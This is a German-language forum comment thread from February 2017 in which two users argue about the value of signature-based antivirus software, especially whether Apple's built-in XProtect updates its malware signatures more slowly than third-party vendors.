Und ich habe den Eindruck, Du weißt überhaupt nicht, worüber Du sprichst, Dir sind die Details und technischen Zusammenhänge auch egal, Du willst hier einfach nur, die auf dem Tisch des Hauses liegenden Fakten ausblendend und ignorierend, provozieren und dummes Zeug von Dir geben. Wenn Du das unbedingt brauchst, dann mache das, ich klinke mich hiermit aus, das wird mir so langsam zu blöd. Es sind genug der Worte gewechselt, die Positionen sind ausgetauscht, wir können die Diskussion an dieser Stelle nun beenden, der Thread ist sowieso nach unten gerutscht, und mir ist meine Zeit nun auch so langsam zu schade, Dir noch weiter Rede und Antwort zu stehen und auf Dich weiter einzugehen. In diesem Sinne wünsche ich Dir noch einen schönen guten Abend.
-2
sierkb15.02.17 01:18
PaulMuadDib
Schon wieder X-Protect

Genau. Weil Du es so herrlich verneinst und die Augen davor verschließt und es Dir ja herzlich egal ist, wie das alles funktioniert und miteinander zusammenhängt. XProtect IST halt nun mal Apples eingebaute AV-Scanner-Lösung als integraler Bestandteil des Quarantäne-Frameworks, so wie Microsoft seinen Windows-Defender in Windows eingebaut und zum festen Bestandteil des Betriebssystems gemacht hat. Ich kann nichts dafür, Apple nacht es halt seit einer ganzen Weile so und nicht anders. Und diese Apple'sche AV-Lösung namens XProtect funktioniert technisch nach genau demselben technischen Prinzip und mit genau den gleichen Erkennungs- und Zuordnungs-Methoden wie genau jene AV-Lösungen von Drittherstellern, auf die Du so beherzt eindrischt und ihnen prinzipiell die Eignung absprichst. Nämlich signaturbasiert per SHA-Hashes. Und ebenfalls reaktiv, also nachregelnd und damit in Deinen Augen prinzipiell zu spät (wobei man durchaus auch sagen könnte: lieber mit ein wenig Verspätung erkannt als gar nicht erkannt – viele Nutzer profitieren dann davon, selbst wenn die Signatur erst mit ein paar Tagen Zeitverzögerung bereitsteht, weil man seitens des Anbieters erst dann Samples zur Analyse und Generierung der Signatur zur Verfügung hatte, das reicht aber oft aus, um eine ungehinderte, ungebremste Verbreitung des Schädlings wenigstens einzudämmen und wirkungsvoll auszubremsen).

Sind die Lösungen der AV-Dritthersteller ungeeignet und Augenwischerei und sind mit ihren Signatur-Updates nicht gleich am ersten Tag dabei, um derlei frühzeitig komplett abzufangen, dann ist es Apples XProtect leider ERST RECHT, weil genau gleich funktionierend und auf dem selben Prinzip und auch von der Methodik und Technik her sehr gleich funktionierend. Und leider NOCH schlechter erkennend/funktionierend und NOCH schlechter gewartet von Apple. Es wäre schön, wäre es anders und wäre es besser und besser gewartet. Dem ist aber leider nicht so. XProtect hat heute, 15.02.2017 leider immer noch kein Signatur-Update erfahren, das die in Rede stehende Schadsoftware erkennen und somit blockieren kann, das betreffende Signatur-Update lässt immer noch auf sich warten. Manche andere AV-Software erkennen den Schädling inzwischen sehr wohl (27 an der Zahl).
Ich darf morgen auf dem Trend-Micro-Workshop nicht vergessen zu fragen, wie hoch deren signaturbasierte Trefferquote ist.

Dann frag' mal. Tue Dir keinen Zwang an. Viel Vergnügen.

Ein aktueller VirusTotal-Auszug bzgl. dieses aktuellen in Rede stehenden Trojaners sagt, dass TrendMicros Software ihn erkennt als: TROJ_FRS.0NA004B917 bzw. W2KM_DLOADR.YYSXV: , die haben ihr Signatur-Update inzwischen also gemacht, wie zahlreiche andere AV-Software-Hersteller auch.

Apples in macOS eingebautem XProtect erkennt diesen Schädling bisher leider immer noch nicht. Mangels entsprechender Signatur (SHA-Hash). Mangels aktuellem Signatur-Update.

Sich hier also aus dem Fenster zu lehnen und hämisch über andere zu lästern ist somit wohlfeil und Du tust Apple damit sicher keinen Gefallen damit, da dieser Vorwurf mit viel größerm Nachdruck auf Apple zurückfällt, denn sie sind hier in der Erkennungsrate und rechtzeitigen Signatur-Updates, um überhaupt etwas erkennen zu können, NOCH schlechter als jene gescholtenen Dritthersteller. Du solltest also erstmal Apple ins Gebet nehmen und bessere Arbeit anmahnen, denn es ist ihr Betriebssystem, ihre eingebaute AV-Lösung, ihre Verantwortung darüber, die hier einmal wieder erst recht wirkungslos ist wegen schlichten Nichtstun Apples und die den anderen hinterherhinkt und viel viel größere Erkennungslücken aufweist als all die anderen.

Du argumentierst hier vor diesem Hintergrund unfair und unredlich: "Was siehst du aber den Splitter im Auge deines Bruders, den Balken aber in deinem Auge bemerkst du nicht?" (Matthäus 7,3)

Und ich habe den Eindruck, Du weißt überhaupt nicht, worüber Du sprichst, Dir sind die Details und technischen Zusammenhänge auch egal, Du willst hier einfach nur, die auf dem Tisch des Hauses liegenden Fakten ausblendend und ignorierend, provozieren und dummes Zeug von Dir geben. Wenn Du das unbedingt brauchst, dann mache das, ich klinke mich hiermit aus, das wird mir so langsam zu blöd. Es sind genug der Worte gewechselt, die Positionen sind ausgetauscht, wir können die Diskussion an dieser Stelle nun beenden, der Thread ist sowieso nach unten gerutscht, und mir ist meine Zeit nun auch so langsam zu schade, Dir noch weiter Rede und Antwort zu stehen und auf Dich weiter einzugehen. In diesem Sinne wünsche ich Dir noch einen schönen guten Abend.
-2
sierkb15.02.17 01:21
PaulMuadDib
Schon wieder X-Protect

Genau. Weil Du es so herrlich verneinst und die Augen davor verschließt und es Dir ja herzlich egal ist, wie das alles funktioniert und miteinander zusammenhängt. XProtect IST halt nun mal Apples eingebaute AV-Scanner-Lösung als integraler Bestandteil des Quarantäne-Frameworks, so wie Microsoft seinen Windows-Defender in Windows eingebaut und zum festen Bestandteil des Betriebssystems gemacht hat. Ich kann nichts dafür, Apple nacht es halt seit einer ganzen Weile so und nicht anders. Und diese Apple'sche AV-Lösung namens XProtect funktioniert technisch nach genau demselben technischen Prinzip und mit genau den gleichen Erkennungs- und Zuordnungs-Methoden wie genau jene AV-Lösungen von Drittherstellern, auf die Du so beherzt eindrischt und ihnen prinzipiell die Eignung absprichst. Nämlich signaturbasiert per SHA-Hashes. Und ebenfalls reaktiv, also nachregelnd und damit in Deinen Augen prinzipiell zu spät (wobei man durchaus auch sagen könnte: lieber mit ein wenig Verspätung erkannt als gar nicht erkannt – viele Nutzer profitieren dann davon, selbst wenn die Signatur erst mit ein paar Tagen Zeitverzögerung bereitsteht, weil man seitens des Anbieters erst dann Samples zur Analyse und Generierung der Signatur zur Verfügung hatte, das reicht aber oft aus, um eine ungehinderte, ungebremste Verbreitung des Schädlings wenigstens einzudämmen und wirkungsvoll auszubremsen).

Sind die Lösungen der AV-Dritthersteller ungeeignet und Augenwischerei und sind mit ihren Signatur-Updates nicht gleich am ersten Tag dabei, um derlei frühzeitig komplett abzufangen, dann ist es Apples XProtect leider ERST RECHT, weil genau gleich funktionierend und auf dem selben Prinzip und auch von der Methodik und Technik her sehr gleich funktionierend. Und leider NOCH schlechter erkennend/funktionierend und NOCH schlechter gewartet von Apple. Es wäre schön, wäre es anders und wäre es besser und besser gewartet. Dem ist aber leider nicht so. XProtect hat heute, 15.02.2017 leider immer noch kein Signatur-Update erfahren, das die in Rede stehende Schadsoftware erkennen und somit blockieren kann, das betreffende Signatur-Update lässt immer noch auf sich warten. Manche andere AV-Software erkennen den Schädling inzwischen sehr wohl (27 AV-Produkte).
Ich darf morgen auf dem Trend-Micro-Workshop nicht vergessen zu fragen, wie hoch deren signaturbasierte Trefferquote ist.

Dann frag' mal. Tue Dir keinen Zwang an. Viel Vergnügen.

Ein aktueller VirusTotal-Auszug bzgl. dieses aktuellen in Rede stehenden Trojaners sagt, dass TrendMicros Software ihn erkennt als: TROJ_FRS.0NA004B917 bzw. W2KM_DLOADR.YYSXV: , die haben ihr Signatur-Update inzwischen also gemacht, wie zahlreiche andere AV-Software-Hersteller auch.

Apples in macOS eingebautem XProtect erkennt diesen Schädling bisher leider immer noch nicht. Mangels entsprechender Signatur (SHA-Hash). Mangels aktuellem Signatur-Update.

Sich hier also aus dem Fenster zu lehnen und hämisch über andere zu lästern ist somit wohlfeil und Du tust Apple damit sicher keinen Gefallen damit, da dieser Vorwurf mit viel größerm Nachdruck auf Apple zurückfällt, denn sie sind hier in der Erkennungsrate und rechtzeitigen Signatur-Updates, um überhaupt etwas erkennen zu können, NOCH schlechter als jene gescholtenen Dritthersteller. Du solltest also erstmal Apple ins Gebet nehmen und bessere Arbeit anmahnen, denn es ist ihr Betriebssystem, ihre eingebaute AV-Lösung, ihre Verantwortung darüber, die hier einmal wieder erst recht wirkungslos ist wegen schlichten Nichtstun Apples und die den anderen hinterherhinkt und viel viel größere Erkennungslücken aufweist als all die anderen.

Du argumentierst hier vor diesem Hintergrund unfair und unredlich: "Was siehst du aber den Splitter im Auge deines Bruders, den Balken aber in deinem Auge bemerkst du nicht?" (Matthäus 7,3)

Und ich habe den Eindruck, Du weißt überhaupt nicht, worüber Du sprichst, Dir sind die Details und technischen Zusammenhänge auch egal, Du willst hier einfach nur, die auf dem Tisch des Hauses liegenden Fakten ausblendend und ignorierend, provozieren und dummes Zeug von Dir geben. Wenn Du das unbedingt brauchst, dann mache das, ich klinke mich hiermit aus, das wird mir so langsam zu blöd. Es sind genug der Worte gewechselt, die Positionen sind ausgetauscht, wir können die Diskussion an dieser Stelle nun beenden, der Thread ist sowieso nach unten gerutscht, und mir ist meine Zeit nun auch so langsam zu schade, Dir noch weiter Rede und Antwort zu stehen und auf Dich weiter einzugehen. In diesem Sinne wünsche ich Dir noch einen schönen guten Abend.
-2
PaulMuadDib15.02.17 08:24
Erwischt.

Ich weiß genau, von was ich rede.
+1
sierkb15.02.17 12:35
PaulMuadDib:

Dann argumentiere hier anders und glaubwürdiger, sodass es dazu auch passt, dass Du weißt, wovon Du redest und offenbare weniger Wissenslücken. Oder Du redest ganz bewusst wider besseres Wissen und an den Fakten vorbei, das kann auch sein.
-2
PaulMuadDib16.02.17 10:38
Keine Ahnung, von welchen Fakten Du redest. Offenbar bist du der festen Überzeugung, daß sie ein "Viren-Tool" jemals tatsächlich eine Bedrohung abwenden könnte. Macht sie aber nicht.

Es ist ein ewiges Hinterherrennen. Mit immensen Ressourcenverbrauch. Von den Lizenzkosten, die das nach sich zieht (das Zeug braucht i.d.R. ja auch noch sowas wie eine Datenbank und so), fange ich erst gar nicht an. Was uns die Migration nach OfficeScan schon im Vorfeld an Kopfzerbrechen bereitet, ist gruselig. Und, damit wir möglicherweise einen Malware finden, welche nicht schlau genug ist, aktuelle Scanner aushebeln zu können. Glücklicherweise haben wir andere Maßnahmen getroffen, die uns vor dem größten Schaden schützen. Die sind auch aufwändig, aber unter dem Strich billiger und effektiver.
+1
sierkb16.02.17 14:42
PaulMuadDib
Keine Ahnung, von welchen Fakten Du redest.

Von denen, die Du negierst und gerne ausblendest. Dass zum Beispiel XProtect als Apples AV-Programm existiert, das ebenfalls signaturbasiert funktioniert, das beenfalls raktiv funktioniert, das von Apple aber leider noch schlechter gewartet wird mit teilweise noch viel größerer zeitlicher Verzögerung und noch viel weniger Mac-Schadsoftware erkennend als jene Software, die Du Du hier schillst.
Zudem: Die Signatur-Liste von XProtect wird bei jedem einzelnen Download, bei jeder einzelnen Datei-Operation des Finders konsultiert und im Speicher gehalten. Schon mal daran gedacht, dass Apple diese Datei künstlich dumm hält, um sie klein zu halten, um den eh schon lahmen Finder nicht noch weiter auszubremsen? Und dass die von Dir gescholtene AV-Software von Drittherstellern viel größere Signatur-Listen hat, die viel mehr erkennen als Appls XProtect und sie auch deshalb aufgrund ihrer Größe das System ausbremsen? XProtect würde das System dann wahrscheinlich ganz genauso ausbremsen oder noch viel mehr, wenn Apple seine eigene Signaturliste besser pflegen und in ihrem Umfang vergrößern würde. Hätte einerseits den Vorteil, dass XProtect mehr Schadsofttware erkennt und nicht soviel an dessen Erkennungs-Radar vorbeirauscht. Nachteil: es muss bei jeder einzelnen Datei-Operation gegen diese lange Liste geprüft werden. Was das System verlangsamt. Kein Wunder also, dass Apples XProtect schneller ist als Dritt-Software, wenn ich nur eine klitzekleine Liste habe, gegen die ich prüfen muss gegenüber einer großen Liste bei anderen Herstellern, gegen die geprüft wird. Nur: was nutzt mir dann so ein XProtect, wenn eine große Anzahl an in Umlauf befindlicher Mac-/iOS-Schadsoftware davon nicht erkannt wird und am Erkennungsradar vorbeirauscht? Und Apple dann auch noch zudem sehr langsam darin ist, diese Listen überhaupt aktuell zu halten? Der Nutzer, der darauf vertraut, dass Apple sich schon irgendwie und irgedwann darum kümmern wird, der wartet da teilweise ewig, steht so lange dann komplett im Regen. Und wieviele Nutzer wissen überhaupt davon, dass was in Umlauf ist und sind entsprechend dann vorsichtig und umsichtig?
Es ist ein ewiges Hinterherrennen.

Exakt! Schrieb und unterstrich ich bereits mehrfach und immer wieder. Deshalb sind schnelle Reaktionszeiten und gute Pflege der Signatur-Dateien da ja auch so enorm wichtig! Und genau die legt Apple eben leider nicht an den Tag, ist da sogar noch langsamer und behäbiger als genau jene, auf die Du mit Deinem Finger zeigst, und Apples Signatur-Liste ist ein Witz, weiß von vielen in Umlauf befindlicher Mac- und iOS-Schadsoftware schlicht weg nichts, die steht da leider nicht drin mit einem entsprechenden Signatur-Eintrag, kann diese somit also auch gar nicht erkennen und deren Ausführung ggf. blockieren.
Offenbar bist du der festen Überzeugung, daß sie ein "Viren-Tool" jemals tatsächlich eine Bedrohung abwenden könnte. Macht sie aber nicht.

Nein! Darum geht's auch nicht. Aber eingrenzen und verlangsamen statt dass sowas dann ungehindert und ungebremst sich weiterverbreiten kann. Darum geht's!
Siehe zuvor Gesagtes.
Mit immensen Ressourcenverbrauch.

Siehe zuvor Gesagtes.
Von den Lizenzkosten, die das nach sich zieht

XProtect ist Bestandteil des macOS-Betriebssystems und kostet somit nichtr extra. Zudem gibt es durchaus kostenfrei Drittprogramme, die man ggf. zusätzlich und als Ergänzung verwenden kann.
(das Zeug braucht i.d.R. ja auch noch sowas wie eine Datenbank und so)

XML. SQlite. Text files.
Existiert, findet schon längst statt. Das halbe macOS-System funktioniert auf dieser Basis.
Was uns die Migration nach OfficeScan schon im Vorfeld an Kopfzerbrechen bereitet…

Gehört hier nicht zum Thema, ist hier und fürs Thema erst recht völlig irrelevant.
-3
PaulMuadDib16.02.17 22:46
sierkb

XML. SQlite. Text files.
Existiert, findet schon längst statt. Das halbe macOS-System funktioniert auf dieser Basis.
Kann es sein, daß Du eine größere Endpoint-Protection-Lösung noch nie aus der Nähe gesehen hast? Ansonsten verrate mir, welche von denen eine vom Hersteller unterstütze Datenbank im Programm hat die nicht a) eine proproprietäres Interne DB (bei Symantec vollschrott, bei TrendMicro wissen wir's noch nicht, an die Vorgänger erinnere ich mich nicht mehr), b) MS-SQL c) Oracle verwendet?

Die Lizenzkosten der letzten beiden kennst Du?
+2
sierkb16.02.17 23:35
PaulMuadDib:

Bleibe mal bitte bei Apples hauseigener Lösung, die hier erneut versagt hat und die genau gleich funktioniert wie das System der anderen, ebenfals signaturbasiert, ebenfalls mit Hashes, ebenfalls auf Basis von Malware-Samples, die analysiert und ein Hash gebildet werden muss. Suche nicht die Fehler bei den anderen – bei der hauseigenen Lösung gibt es genug Fehler und Nachlässigkeiten und Unzulänglichkeiten zu beklagen, teilweise genau dieselben wie bei den anderen, sogar noch schlimmer, weil eben so schlecht gepflegt. Du versuchst davon abzulenken, bitte höre auf damit, ich finde das langsam ermüdend, und es bringt uns kein Stück weiter.

Und um kurz auf Deine Frage einzugehen: Apple verwendet XML (also eine Text-Datei) für seine XProtect.plist und reinen ASCII-Text für seine XProtect.yara-Datei. Beides sehr leicht zu parsen, die betreffenden Werkzeuge gehören zum ddarunterliegenden Unix-System dazu. Du kannst die Dateien mit jedem beliebigen Text-Editor einsehen, sogar mit dem Webbrowser.
Weiteres Beispiel: ClamXav verwendet für seine Signatur ebenfalls eine reine Text-Datei, in dr die Hashes drinstehen. Kannste ebenfalls mit jedem beliebigen Text-Editor oder einem Web-Browser Deiner Wahl reingucken und lesen.
Man könnte die Daten auch im JSON-Format oder als SQLite3 -Datenbank abspeichern, wird sicher auch von dem einen oder anderen Hersteller gemacht. SQLite3 ist fester Bestandteil von Darwin, dem Unix-Unterbau von macOS und iOS. Apple verwendet SQLite3 und XML (Plist-Dateien sind XML-Dateien) in seinem System sehr sehr oft und überall. Mail.app speichert seinen Mail-Index in einer SQLite3-Datei. Safari diverse Daten wie Bookmarks etc. ebenso. Viele andere macos/iOS-Apps und das Betriebssytem selber verwenden SQLite3, um Daten in einer kleinen, dateigestützten SQLite3-Datenbank abzulegen. Firefox z.B. ebenso. Chrome ebenso. SQLite3 ist deshalb so verbreitet und wird gerne verwendet, weil es so schön klein und vor allem performant ist und keinen Overhead mit sich bringt und weil Open Source und kostenfrei.
Aber das nur am Rande. Es führt vom Thema weg und hat damit nichts zu tun, Deine Datenbank-Einwände sind an den Haaren herbeigezogen, sind somit alle entkräftet, weil hier eh nicht zutreffend.

Das was Du den anderen vorwirfst, werfe bitte mindestens ebenso auch Apple vor, die machen ihre Hausaufgaben da leider sehr unzureichend und schleppend. Und zwar ausgerechnet an genau der Front, die Du den anderen vorwirfst, dass die ihre Hausaufgaben nicht richtig machen. Apple macht seine Hausaufgaben da noch schlechter. Da gilt es erstmal anzufangen, diese eigenen Hausaufgaben zu erledigen. Bei genau derselben Sache. Bevor man hingeht und auf andere zeigt und bei denen den Fehler sucht.

XProtect ist leider immer noch nicht auf dem aktuellen Stand, hat die letzten 2-3 Schädlinge, die von sich Reden gemacht haben, leider immer noch nicht in seine Signaturliste (man kann auch sagen: Signatur-Datenbank) aufgenommen, der nichtsahende und nicht darüber informierte Anwender rauscht da solange das so ist und er darauf blind vertraut, dass Apple es schon irgendwie von ihm abhalten wird, immer noch ungebremst rein. Wie lange will Apple denn noch warten mit einem Update? Erst dann, wenn die Fallzahlen in die Höhe gestiegen sind und von sich reden machen? Oder erst mit dem kommenden Betriebssystem-Update? Das System schaut mehrmals täglich auf Apples Server nach, ob da ein entsprechendes XProtect-Update mit aktualisierter Signaturliste bereitsteht. Dort liegt aber keines, das kann man sehen und nachprüfen, die Server-URLs, wo das System sich seine Updates von Apple herholt, sind bekannt, da kann man direkt drauf und nachschauen. Bisher nix.

Währenddessen haben viele andere AV-Hersteller ihre betreffenden Schadsoftware-Samples, die sie sich organisiert haben oder zugespielt bekommen haben, analysiert, entsprechende Hashes gebildet und diese in ihre jeweiligen Signatur-Dateien eingetragen und per Update auf die Rechner der Anwender gebracht. Apple bislang leider nicht. Wann liefert Apple hier denn endlich mal nach, zieht hier Apple denn endlich mal nach, wie lange will sich Apple damit denn noch Zeit lassen? Bei Apple trifft Dein Vorwurf, den Du gegen die anderen erhebst, dass sie zeitverzögert ihre Signaturen bereitstellen, doch leider erst recht zu! Es liegt doch alles offen auf dem Tisch, ist doch alles einsehbar und nachprüfbar. Ich bin doch nicht der Erste und Einzige, der das beklagt, dass es leider so ist.

Bitte lass' uns jetzt hier enden, wirklich, ich habe echt keine Lust mehr. Es bringt nichts, wir drehen uns im Kreis. Lass' bitte jetzt mal gut sein. Es gibt wirklich Wichtigeres, als sich weiter über sowas zu streiten und sich in die Haare zu kriegen. Ich habe noch zu tun, wende mich jetzt mal wichtigeren Dingen zu. In diesem Sinne reiche ich Dir nun das Ganze mal abschließend versöhnlich die Hand und wünsche Dir trotzdem noch einen schönen Abend.
-2
PaulMuadDib21.02.17 08:09
Ich gebe es auf. Mich interessiert diese "Lösung" NICHT!
Zum letzten Mal. Ist nicht meine Liga. Du hast schlicht keine Ahnung, was es bedeutet Schlangenöl im größeren Stil zu betreiben. Das versucht Du immer mit epischen Texten zu kaschieren.

Boar, es reicht.
+2

Kommentieren

Sie müssen sich einloggen, um die News kommentieren zu können.